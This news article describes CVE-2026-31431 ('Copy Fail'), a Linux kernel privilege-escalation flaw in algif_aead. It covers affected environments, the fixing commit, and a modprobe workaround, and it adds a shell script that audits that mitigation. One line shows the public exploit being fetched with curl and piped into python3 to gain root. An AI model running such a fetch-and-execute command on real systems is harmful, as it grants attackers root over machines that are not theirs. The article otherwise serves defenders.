Key Takeaways

- A single 732-byte Python script can root any Linux distribution shipped since 2017
- The vulnerability exploits a logic bug in the kernel crypto API that has existed for nearly a decade
- Shared environments like CI/CD runners, container hosts, and dev boxes face the highest risk
What Is Copy Fail?
Security researchers have disclosed CVE-2026-31431, nicknamed 'Copy Fail.' It is a local privilege escalation vulnerability that affects every mainstream Linux distribution released since 2017. Unlike most Linux LPE bugs that require race conditions or kernel-specific offsets, Copy Fail is a straight-line logic flaw. The same 732-byte Python script achieves root access on Ubuntu, Fedora, Debian, Arch, Rocky, Alma, Oracle Linux, and embedded systems.
The bug lives in authencesn, a component of the kernel crypto API. Attackers chain it through AF_ALG and splice() to achieve a 4-byte page-cache write. This primitive has been silently exploitable for nearly a decade.
Why This Vulnerability Is Different
Most local privilege escalation bugs require specific conditions. Maybe the attacker needs to win a race. Maybe they need kernel debugging features enabled. Maybe they need to know exact memory offsets for the target kernel version.
Copy Fail requires none of these. The researchers demonstrated the same exploit binary working unmodified across four different Linux distributions in a single recording. The requirements are minimal: an unprivileged local user account. No network access needed. No kernel debugging features. No pre-installed primitives.
The userspace interface to the kernel crypto API (AF_ALG) ships enabled in essentially every mainstream distro's default configuration. This means that on a fresh install, every kernel from 2017 up to the patch is exploitable out of the box.
Who Is Vulnerable?
The researchers outline several high-risk scenarios:
- Shared dev boxes, shell-as-a-service platforms, jump hosts, and build servers where multiple users share a kernel
- Container and Kubernetes environments, because the page cache is shared across the host. A pod with the right primitives can compromise the node and cross tenant boundaries
- CI/CD infrastructure including GitHub Actions self-hosted runners, GitLab runners, and Jenkins agents that execute untrusted PR code as a regular user
- AI and ML platforms like notebook hosts, agent sandboxes, serverless functions, and any environment running tenant-supplied containers or scripts
Who Is Not at Immediate Risk?
Single-tenant production environments where only your team has shell access face lower immediate risk. You are already the only user. The bug does not grant remote attackers access by itself. However, any local code execution path becomes a root path. A web app RCE plus Copy Fail equals full system compromise.
How the Exploit Works
The vulnerability stems from a 2017 optimization in algif_aead that allowed in-place operations. The researchers explain that this change created a condition where page-cache pages could end up in a writable destination scatterlist. Through AF_ALG and splice(), an attacker can write 4 bytes to the page cache. The proof-of-concept targets /usr/bin/su by default, though any setuid binary works.
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)
The PoC is written in Python 3.10+ using only standard library modules (os, socket, zlib). The researchers also provide a non-destructive checker that detects whether algif_aead is loadable and whether your kernel still has the vulnerable scratch-write path. The checker does not escalate privileges.
How to Patch
Update your distribution's kernel package to one that includes mainline commit a664bf3d603d. This commit reverts the 2017 algif_aead in-place optimization, preventing page-cache pages from ending up in the writable destination scatterlist. Most major distributions are shipping the fix now.
If you cannot patch immediately, disable the algif_aead module:
# echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
# rmmod algif_aead 2>/dev/null || true
What does this break? For the vast majority of systems, nothing measurable. The algif_aead module handles authenticated encryption for the kernel crypto API. Most userspace applications do not rely on it directly.
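The two commands above are easy to run once, but on a fleet you also want to confirm that the rule is actually in place and that the module is not still resident. The following POSIX shell script is an added example written for this article; it is not the researchers' checker and not part of the Theori repository. It reads the module list and the modprobe.d directory from paths passed as arguments (defaulting to /proc/modules and /etc/modprobe.d), so it can be exercised against constructed files, and it reports one of three states: "loaded" (module resident, mitigation incomplete), "blocked" (the install rule is present and the module is not loaded) or "loadable" (neither, meaning an unprivileged AF_ALG socket could still autoload it). The status words and the file name disable-algif.conf are this example's own choices; the install rule itself is the one from the article.

```shell
#!/bin/sh
# Added example for auditing and applying the modprobe-based mitigation for
# CVE-2026-31431 (disable algif_aead). Not the researchers' checker.
# Paths are parameters so the functions can be run against constructed files.

# Return 0 if algif_aead is listed in a /proc/modules-style file.
# /proc/modules lines start with the module name followed by a space.
algif_aead_loaded() {
    modules_file="${1:-/proc/modules}"
    [ -r "$modules_file" ] && grep -q '^algif_aead ' "$modules_file"
}

# Return 0 if some .conf in the modprobe.d directory carries the workaround
# rule "install algif_aead /bin/false", allowing for surrounding whitespace.
algif_aead_blocked() {
    conf_dir="${1:-/etc/modprobe.d}"
    [ -d "$conf_dir" ] || return 1
    grep -qs -E '^[[:space:]]*install[[:space:]]+algif_aead[[:space:]]+/bin/false' \
        "$conf_dir"/*.conf
}

# Summarise the mitigation state as a single word (constructed vocabulary):
#   loaded   - module is resident; the install rule alone does not unload it
#   blocked  - install rule present and module not loaded
#   loadable - no rule and not loaded; an AF_ALG socket could autoload it
algif_aead_status() {
    if algif_aead_loaded "$1"; then
        echo loaded
    elif algif_aead_blocked "$2"; then
        echo blocked
    else
        echo loadable
    fi
}

# Apply the workaround from the article: write the install rule into the
# given modprobe.d directory and unload the module only if it is resident.
# Needs root when pointed at the real /etc/modprobe.d and /proc/modules.
apply_mitigation() {
    conf_dir="${1:-/etc/modprobe.d}"
    modules_file="${2:-/proc/modules}"
    printf 'install algif_aead /bin/false\n' > "$conf_dir/disable-algif.conf"
    if algif_aead_loaded "$modules_file"; then
        rmmod algif_aead 2>/dev/null || true
    fi
}

# Stand-alone run: report the live system state (read-only).
[ -r /proc/modules ] && printf 'algif_aead: %s\n' \
    "$(algif_aead_status /proc/modules /etc/modprobe.d)"
```

Run it as is for a read-only report; call `apply_mitigation` as root to write the rule and unload the module. Note that a "blocked" result only covers autoloading through modprobe: it does not tell you whether the running kernel already carries the fix, so it is a stopgap check until the patched kernel package is installed and the machine rebooted.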
Tracking and Resources
The researchers published the PoC to help defenders verify their systems and validate vendor patches. The issue tracker is available at github.com/theori-io/copy-fail-CVE-2026-31431. If you have tested the vulnerability on distributions not yet listed, the researchers invite you to open an issue.
Frequently Asked Questions
Does CVE-2026-31431 affect all Linux distributions?
Yes. Any Linux distribution with a kernel built between 2017 and the patch is vulnerable. This includes Ubuntu, Debian, Fedora, Arch, Rocky, Alma, Oracle Linux, and embedded systems.
Can CVE-2026-31431 be exploited remotely?
No. The bug requires local access with an unprivileged user account. However, any remote code execution vulnerability combined with Copy Fail becomes a root compromise.
What kernel commit fixes Copy Fail?
Mainline commit a664bf3d603d reverts the vulnerable 2017 algif_aead optimization. Check your distribution's security advisories for the patched kernel version.
Is there a workaround if I cannot patch immediately?
Yes. Disable the algif_aead module by adding 'install algif_aead /bin/false' to /etc/modprobe.d/disable-algif.conf and unloading the module with rmmod.
Are containers protected from Copy Fail?
No. The page cache is shared across the host. A container with the ability to load kernel modules or access AF_ALG can exploit the vulnerability and cross tenant boundaries.
Source: Hacker News: Best / Xint
Discovery Details and Technical Mechanism
The new article identifies the discovery team (Theori) and reveals the specific vulnerability mechanism involving a 4-byte write to the page cache via 'AF_ALG' and 'splice()' calls. It also provides a disclosure timeline, noting the flaw was reported on March 23 and patches were released within a week.
Manaal Khan
Tech & Innovation Writer
Produced with AI assistance and reviewed by the Logicity editorial team. Learn more in our Editorial Policy.